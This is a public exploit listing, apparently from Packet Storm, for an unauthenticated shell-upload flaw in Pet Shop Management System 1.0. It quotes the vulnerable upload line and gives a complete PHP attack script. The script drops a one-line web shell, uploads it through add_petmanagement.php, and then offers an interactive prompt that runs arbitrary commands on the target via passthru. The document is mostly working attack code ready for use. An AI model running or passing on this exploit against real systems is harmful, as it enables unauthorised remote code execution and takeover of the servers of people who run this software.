Pet Shop Management System 1.0 Shell Upload

Pet Shop Management System version 1.0 suffers from a remote shell upload vulnerability.

MD5 | 627f1d99e1a6128d4f0c6fe3fd446a5b

Download

# Title: Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 28.09.2021
# Author: Mr.Gedik
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14962/petshop-management-system-using-phppdo-oop-full-source-code-complete.html
# Version: 1.0
# https://asciinema.org/a/mjRFsUvshjGIcTsped1PAH8CB


Vulnerable code controllers/add_petmanagement.php
Line 21 - move_uploaded_file($_FILES["images"]["tmp_name"],
$_SERVER['DOCUMENT_ROOT']."/Petshop_Management_System/uploads/" .
addslashes($_FILES["images"]["name"]));

Exploit
#############

<?php
/*
@author:mrgedik
*/
function anim($msg, $time)
{
    $msg = str_split($msg);
    foreach ($msg as $ms) {
        echo $ms;
        usleep($time);
    }
}

anim("__  __       _____          _ _ _
|  \/  |     / ____|        | (_) |
| \  / |_ __| |  __  ___  __| |_| | __
| |\/| | '__| | |_ |/ _ \/ _` | | |/ /
| |  | | |_ | |__| |  __/ (_| | |   <
|_|  |_|_(_) \_____|\___|\__,_|_|_|\_\
", 900);

echo PHP_EOL;
while(1)
{
    echo anim("Target (http://example.com/path/): ", 800);
    $target = trim(fgets(STDIN));
    echo PHP_EOL;
    if (filter_var($target, FILTER_VALIDATE_URL) === FALSE) {
        echo "Not a valid URL".PHP_EOL;
    }else {
        break;
    }
}
@unlink("exp.php");
$fw = fopen("exp.php","a+");
fwrite($fw,'<?php $_POST[m]($_POST[g]); ?>');
fclose($fw);

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_URL, $target."/controllers/add_petmanagement.php");
$fields = [
    'images' => new \CurlFile("exp.php", 'image/png', 'exp.php')
];
curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);


$response = curl_exec($ch);
@unlink("exp.php");

if(strstr($response,"success"))
{
    while(1)
    {
        echo anim("root@pwn: ", 800);
        $command = trim(fgets(STDIN));
        if($command == trim("exit"))
        {
            exit;
        }
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL,$target."/uploads/exp.php");
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS,"m=passthru&g=".trim($command));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        echo curl_exec($ch);
        curl_close ($ch);
    }
}else
{
    echo anim("Fail", 800);
}


?>

Source: packetstormsecurity.com